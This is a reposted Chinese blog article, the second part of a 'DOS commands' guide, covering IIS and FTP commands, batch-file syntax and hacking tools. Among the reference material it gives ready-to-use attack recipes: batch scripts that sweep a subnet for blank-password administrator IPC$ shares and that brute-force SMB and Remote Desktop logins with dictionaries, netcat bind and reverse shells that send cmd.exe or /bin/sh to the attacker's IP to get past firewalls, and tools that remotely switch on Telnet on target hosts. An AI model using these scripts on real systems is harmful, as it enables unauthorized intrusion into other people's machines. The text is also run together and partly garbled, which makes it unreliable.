转载 DOS 命令 下

　原文地址：DOS 命令(下)作者：潇洒无痕 REM 文本内容在批处理文件中添加注解 netsh 查看或更改本地网络配置情况#4 四：IIS 服务命令：iisreset/reboot 重启 win2k 计算机(但有提示系统将重启信息出现)iisreset/start 或 stop 启动(停止)所有 Internet 服务 iisreset/restart停止然后重新启动所有 Internet 服务 iisreset/status 显示所有 Internet 服务状态 iisreset/enable 或 disable 在本地系统上启用(禁用)Internet 服务的重新启动 iisreset/rebootonerror 当启动、停止或重新启动 Internet 服务时，若发生错误将重新开机 iisreset/noforce 若无法停止 Internet 服务，将不会强制终止 Internet 服务 iisreset/timeout Val 在到达逾时间(秒)时，仍未停止 Internet 服务，若指定/rebootonerror 参数，则电脑将会重新开机。预设值为重新启动 20 秒，停止 60 秒，重新开机 0 秒。FTP 命令：(后面有详细说明内容)ftp 的命令行格式为：[主机名]-v 显示远程服务器的所有响应信息。-d 使用调试方式。-n 限制 ftp 的自动登录,即不使用.netrc 文件。-g 取消全局文件名。help[命令]或?[命令]查看命令说明 bye 或 quit 终止主机 FTP 进程,并退出 FTP 管理方式.pwd 列出当前远端主机目录 put 或 send 本地文件名[上传到主机上的文件名]将本地一个文件传送至远端主机中 get 或 recv[远程主机文件名][下载到本地后的文件名]从远端主机中传送至本地主机中 mget[remote-files]从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls[remote-directory][local-file]列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII 方式传送文件(缺省值)bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp 会话(与 open 对应)open host[port]建立指定 ftp 服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete[remote-files]删除一批文件mkdir directory-name 在远端主机中建立目录 rename[from][to]改变远端主机中的文件名 rmdir directory-name 删除远端主机中的目录 status 显示当前FTP 的状态 system 显示远端主机系统类型 user user-name[password][account]重新以别的用户名登录远端主机 open host[port]重新建立一个新的连接prompt 交互提示模式 macdef 定义宏命令 lcd 改变当前本地主机的工作目录,如

　果缺省,就转到当前用户的 HOME 目录 chmod 改变远端主机的文件权限 case 当为ON 时,用 MGET 命令拷贝的文件名到本地机器中,全部转换为小写字母 cd remote-dir 进入远程主机目录 cdup 进入远程主机目录的父目录！在本地机中执行交互 shell，exit 回到 ftp 环境,如！ls*.zip cp 复制文件 mv 移动文件 rm文件名删除文件，rm-a 目录名删除目录及子目录 mkdir 目录名建立目录 rmdir删除子目录，目录内没有文档。chmod 设定档案或目录的存取权限 grep 在档案中查找字符串 diff 档案文件比较 find 档案搜寻 date 现在的日期、时间 who 查询目前和你使用同一台机器的人以及 Login 时间地点 w 查询目前上机者的详细资料 whoami 查看自己的帐号名称 groups 查看某人的 Group passwd 更改密码history 查看自己下过的命令 ps 显示进程状态 kill 停止某进程 gcc 黑客通常用它来编译 C 语言写的文件 su 权限转换为指定使用者 telnet IP telnet 连接对方主机(同 win2K)，当出现 bash$时就说明连接成功。连接上某服务器(同win2K)附：批处理命令与变量 1：for 命令及变量基本格式：FOR/参数%variable IN(set)DO command[command_parameters]%variable：指定一个单一字母可替换的参数，如：%i，而指定一个变量则用：%%i，而调用变量时用：%i%，变量是区分大小写的(%i 不等于%I)。批处理每次能处理的变量从%0-%9 共 10 个，其中%0 默认给批处理文件名使用，%1 默认为使用此批处理时输入的的第一个值，同理：%2-%9 指输入的第 2-9 个值；例：net use\ipipc$pass/user：user 中 ip 为%1,pass 为%2,user 为%3(set)：指定一个或一组文件，可使用通配符，如：(D：user.txt)和(1 1254)(1-1 254),{"(1 1254)"第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从 1 到 254；"(1-1 254)"说明：即从 254 到 1}command：指定对第个文件执行的命令，如：net use 命令；如要执行多个命令时，命令这间加：&来隔开command_parameters：为特定命令指定参数或命令行开关 IN(set)：指在(set)中取值；DO command：指执行 command 参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d：pass.txt)时}。用法举例：@echo off echo 用法格式：test.bat*.*.*test.txt for/L%%G in(1 1254)do echo%1.%%G test.txt&net use\%1.%%G/user：*istrator|find"命令成功完成"test.txt 存为 test.bat 说明：对指定的一个 C 类网段的 254 个 IP 依次试建立*istrator 密码为空的IPC$连接，如果成功就把该 IP 存在 test.txt 中。/L 指用增量形式(即从 1-254或 254-1)；输入的 IP 前面三位：*.*.*为批处理默认的%1；%%G 为变量(ip 的

　最后一位)；&用来隔开 echo 和 net use 这二个命令；|指建立了 ipc$后，在结果中用 find 查看是否有"命令成功完成"信息；%1.%%G 为完整的 IP 地址；(1 1254)指起始值，增长量，结止值。@echo off echo 用法格式：ok.bat ip FOR/F%%i IN(D：user.dic)DO smb.exe%1%%i D：pass.dic 200 存为：ok.exe说明：输入一个 IP 后，用字典文件 d：pass.dic 来暴解 d：user.dic 中的用户密码，直到文件中值取完为止。%%i 为用户名；%1 为输入的 IP 地址(默认)。#7七：2：if 命令及变量基本格式：IF[not]errorlevel 数字命令语句如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为"真"。例：IF errorlevel 0 命令指程序执行后返回的值为 0 时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于 1，就执行后面的命令。0指发现并成功执行(真)；1 指没有发现、没执行(假)。IF[not]字符串 1==字符串 2 命令语句如果指定的文本字符串匹配(即：字符串 1 等于字符串 2)，就执行后面的命令。例："if"%2%"=="4"goto start"指：如果输入的第二个变量为4 时，执行后面的命令(注意：调用变量时就%变量名%并加"")IF[not]exist 文件名命令语句如果指定的文件名存在，就执行后面的命令。例："if not nc.exe goto end"指：如果没有发现 nc.exe 文件就跳到"：end"标签处。IF[not]errorlevel 数字命令语句 else 命令语句或 IF[not]字符串 1==字符串 2命令语句 else 命令语句或 IF[not]exist 文件名命令语句 else 命令语句加上：else 命令语句后指：当前面的条件不成立时，就指行 else 后面的命令。注意：else 必须与 if 在同一行才有效。当有 del 命令时需把 del 命令全部内容用括起来，因为 del 命令要单独一行时才能执行，用上后就等于是单独一行了；例如："if exist test.txt.del test.txt.else echo test.txt.missing"，注意命令中的"."(二)系统外部命令(均需下载相关工具)：1、瑞士军刀：nc.exe 参数说明：-h 查看帮助信息-d 后台模式-e prog 程序重定向，一旦连接就执行[危险]-i secs 延时的间隔-l 监听模式，用于入站连接-L 监听模式，连接天闭后仍然继续监听，直到 CTR+C-n IP 地址，不能用域名-o film 记录 16 进制的传输-p[空格]端口本地端口号-r 随机本地及远程端口-t 使用 Telnet 交互方式-u UDP 模式-v 详细输出，用-vv 将更详细-w 数字timeout 延时间隔-z 将输入，输出关掉(用于扫锚时)基本用法：nc-nvv 192.168.0.1 80 连接到 192.168.0.1 主机的 80 端口 nc-l-p 80 开启本机的 TCP 80 端口并监听 nc-nvv-w2-z 192.168.0.1 80-1024 扫锚 192.168.0.1 的 80-1024 端口 nc-l-p 5354-t-e c：winntsystem32cmd.exe 绑定 remote 主机的

　cmdshell 在 remote 的 TCP 5354 端口 nc-t-e c：winntsystem32cmd.exe 192.168.0.2 5354 梆定 remote 主机的 cmdshell 并反向连接 192.168.0.2 的5354 端口高级用法：nc-L-p 80 作为蜜罐用 1：开启并不停地监听 80 端口，直到 CTR+C 为止 nc-L-p 80 c：log.txt 作为蜜罐用 2：开启并不停地监听 80 端口，直到 CTR+C,同时把结果输出到 c：log.txt nc-L-p 80 c：honeyport.txt作为蜜罐用 3-1：开启并不停地监听 80 端口，直到 CTR+C,并把 c：honeyport.txt 中内容送入管道中，亦可起到传送文件作用 type.exe c：honeyport|nc-L-p 80 作为蜜罐用 3-2：开启并不停地监听 80 端口，直到CTR+C,并把 c：honeyport.txt 中内容送入管道中,亦可起到传送文件作用本机上用：nc-l-p 本机端口在对方主机上用：nc-e cmd.exe 本机 IP-p 本机端口*win2K nc-e/bin/sh 本机 IP-p 本机端口*linux,unix 反向连接突破对方主机的防火墙本机上用：nc-d-l-p 本机端口要传送的文件路径及名称在对方主机上用：nc-vv 本机 IP 本机端口存放文件的路径及名称传送文件到对方主机备注：|管道命令或重定向命令。""，例如：tlntadmn test.txt 指把 test.txt 的内容赋值给 tlntadmn 命令@表示执行@后面的命令，但不会显示出来(后台执行)；例：@dir c：winnt d：log.txt 意思是：后台执行 dir，并把结果存在 d：log.txt 中与的区别""指：覆盖；""指：保存到(添加到)。如：@dir c：winnt d：log.txt 和@dir c：winnt d：log.txt 二个命令分别执行二次比较看：用的则是把二次的结果都保存了，而用：则只有一次的结果，是因为第二次的结果把第一次的覆盖了。#8 八：2、扫锚工具：xscan.exe 基本格式 xscan-host 起始 IP[-终止 IP]检测项目[其他选项]扫锚"起始 IP 到终止 IP"段的所有主机信息 xscan-file 主机列表文件名检测项目[其他选项]扫锚"主机 IP 列表文件名"中的所有主机信息用法示例 tscrack 192.168.0.1-l*istrator-w pass.dic 远程用密码字典文件暴破主机的*istrator 的登陆密码 tscrack 192.168.0.1-l*istrator-p 123456 用密码 123456 远程登陆 192.168.0.1 的*istrator 用户@if not exist ipcscan.txt goto noscan@for/f"tokens=1 delims="%%i in(3389.txt)do call hack.bat%%i nscan@echo 3389.txt no find or scan faild(①存为 3389.bat)(假设现有用 SuperScan 或其它扫锚器扫到一批开有3389 的主机 IP 列表文件 3389.txt)3389.bat 意思是：从 3389.txt 文件中取一个 IP，接着运行 hack.bat@if not exist tscrack.exe goto noscan@tscrack%1-l*istrator-w pass.dic rouji.txt：noscan@echo tscrack.exe no find or scan faild(②存为 hack.bat)(运行 3389.bat 就

　OK，且 3389.bat、hack.bat、3389.txt、pass.dic 与 tscrack.exe 在同一个目录下；就可以等待结果了)hack.bat 意思是：运行 tscrack.exe 用字典暴破3389.txt 中所有主机的*istrator 密码，并将破解结果保存在 rouji.txt 文件中。5、其它：Shutdown.exe Shutdown\IP 地址 t：20 20 秒后将对方 NT 自动关闭(Windows 2003 系统自带工具，在 Windows2000 下用进就得下载此工具才能用。在前面 Windows 2003 DOS 命令中有详细介绍。)fpipe.exe(TCP 端口重定向工具)在第二篇中有详细说明(端口重定向绕过防火墙)fpipe-l 80-s 1029-r 80 当有人扫锚你的 80 端口时，他扫到的结果会完全的主机信息 Fpipe-l 23-s 88-r 23 目标 IP 把本机向目标 IP 发送的 23 端口 Telnet 请求经端口重定向后，就通过 88 端口发送到目标 IP 的 23 端口。(与目标 IP 建立 Telnet 时本机就用的 88 端口与其相连接)然后：直接 Telnet 127.0.0.1(本机 IP)就连接到目标 IP 的 23 端口了。OpenTelnet.exe(远程开启 telnet 工具)opentelnet.exe\IP 帐号密码 ntlm 认证方式 Telnet 端口(不需要上传ntlm.exe 破坏微软的身份验证方式)直接远程开启对方的 telnet 服务后，就可用 telnet\ip 连接上对方。NTLM 认证方式：0：不使用 NTLM 身份验证；1：先尝试 NTLM 身份验证，如果失败，再使用用户名和密码；2：只使用 NTLM 身份验证。ResumeTelnet.exe(OpenTelnet 附带的另一个工具)resumetelnet.exe\IP帐号密码用 Telnet 连接完对方后，就用这个命令将对方的 Telnet 设置还原，并同时关闭 Telnet 服务。#10 十：6、FTP 命令详解：FTP 命令是 Internet 用户使用最频繁的命令之一，熟悉并灵活应用 FTP 的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台 FTP 下载，那么就必须学习 FTP 指令。FTP 的命令行格式为：[主机名]，其中-v 显示远程服务器的所有响应信息；-n 限制 ftp 的自动登录，即不使用；.n etrc 文件；-d 使用调试方式；-g 取消全局文件名。FTP 使用的内部命令如下(中括号表示可选项)：1.！[cmd[args]]：在本地机中执行交互 shell，exit 回到 ftp 环境，如：！ls*.zip 2.$macro-ame[args]：执行宏定义 macro-name。3.account[password]：提供登录远程系统成功后访问系统资源所需的补充口令。4.append local-]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。5.ascii：使用 ascii 类型传输方式。6.bell：每个命令执行完毕后计算机响铃一次。7.bin：使用二进制文件传输方式。8.bye：退出 ftp 会话过程。9.case：在使用 mget 时，将远程主机文件名中的大写转为小写字母。10.cd remote-dir：进入远程主机目录。11.cdup：进入远

　程主机目录的父目录。12.chmod mode ：将远程主机文件的存取方式设置为mode，如：chmod 777 a.out。13.close：中断与远程服务器的 ftp 会话(与open 对应)。14.cr：使用 asscii 方式传输文件时，将回车换行转换为回行。15.delete remote-file：删除远程主机文件。16.debug[debug-value]：设置调试方式，显示发送至远程主机的每条命令，如：deb up 3，若设为 0，表示取消 debug。17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。18.disconnection：同 close。19.form format：将文件传输方式设置为 format，缺省为 file 方式。20.get remote-]：将远程主机的文件 remote-file 传至本地硬盘的 local-：设置 mdelete，mget，mput 的文件名扩展，缺省时不扩展文件名，同命令行的-g 参数。22.hash：每传输 1024 字节，显示一个 hash 符号(#)。23.help[cmd]：显示 ftp 内部命令 cmd 的帮助信息，如：help get。24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。25.image：设置二进制传输方式(同 binary)。26.lcd[dir]：将本地工作目录切换至 dir。27.ls[remote-dir][local-file]：显示远程目录remote-dir，并存入本地文件 local- macro-name：定义一个宏，遇到 macdef下的空行时，宏定义结束。29.mdelete[remote-file]：删除远程主机文件。30.mdir remote-files local-file：与 dir 类似，但可指定多个远程文件，如：mdir*.o.*.zipout remote-files：传输多个远程文件。32.mkdir dir-name：在远程主机中建一目录。33.mls remote-：同 nlist，但可指定多个文件名。34.mode[modename]：将文件传输方式设置为 modename，缺省为 stream方式。35.modtime ：显示远程主机文件的最后修改时间。36.mput local-file：将多个文件传输至远程主机。37.newer ：如果远程机中的修改时间比本地硬盘同名文件的时间更近，则重传该文件。38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的 local-[inpattern outpattern]：设置文件名映射机制，使得文件传输时，文件中的某些字符相互转换，如：nmap.[，].[，]，则传输文件 a1.a2.a3 时，文件名变为 a1，a2。该命令特别适用于远程主机为非 UNIX 机的情况。40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如 ntrans1R，则文件名 LLL 将变为 RRR。41.open host[port]：建立指定 ftp 服务器连接，可指定连接端口。42.passive：进入被动传输方式。43.prompt：设置多个文件传输时的交互提示。44.proxy ：在次要控制连接中，执行一条 ftp 命令，该命令允许连接两个 ftp 服务器，以在两个服务器间传输文件。第一条 ftp 命令必

　须为 open，以首先建立两个服务器间的连接。45.put local-]：将本地文件local-file 传送至远程主机。46.pwd：显示远程主机的当前工作目录。47.quit：同 bye，退出 ftp 会话。48.quote arg1，arg2.：将参数逐字发至远程 ftp 服务器，如：quote syst.49.recv remote-]：同 get。50.reget remote-]：类似于 get，但若 local-file 存在，则从上次传输中断处续传。51.rhelp[cmd-name]：请求获得远程主机的帮助。52.rstatus[]：若未指定文件名，则显示远程主机的状态，否则显示文件状态。53.rename[from][to]：更改远程主机文件名。54.reset：清除回答队列。55.restart marker：从指定的标志 marker 处，重新开始 get 或 put，如：restart 130。56.rmdir dir-name：删除远程主机目录。57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1，.2 等。58.send local-]：同 put。59.sendport：设置 PORT 命令的使用。60.site arg1，arg2.：将参数作为SITE 命令逐字发送至远程 ftp 主机。61.size ：显示远程主机文件大小，如：site idle 7200。62.status：显示当前 ftp 状态 63.struct[struct-name]：将文件传输结构设置为 struct-name，缺省时使用 stream 结构。64.sunique：将远程主机文件名存储设置为只一(与 runique 对应)。65.system：显示远程主机的操作系统类型。66.tenex：将文件传输类型设置为 TENEX 机的所需的类型。67.tick：设置传输时的字节计数器。68.trace：设置包跟踪。69.type[type-name]：设置文件传输类型为 type-name，缺省为 ascii，如：type binary，设置二进制传输方式。70.umask[newmask]：将远程服务器的缺省 umask 设置为 newmask，如：umask 371.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。72.verbose：同命令行的-v 参数，即设置详尽报告方式，ftp 服务器的所有响应都将显示给用户，缺省为on.73.?[cmd]：同 help."七"乐无穷，尽在新浪新版博客，快来体验啊~请点击进入~

　特别声明：

　1 ：资料来源于互联网，版权归属原作者 2 ：资料内容属于网络意见，与本账号立场无关 3 ：如有侵权，请告知，立即删除。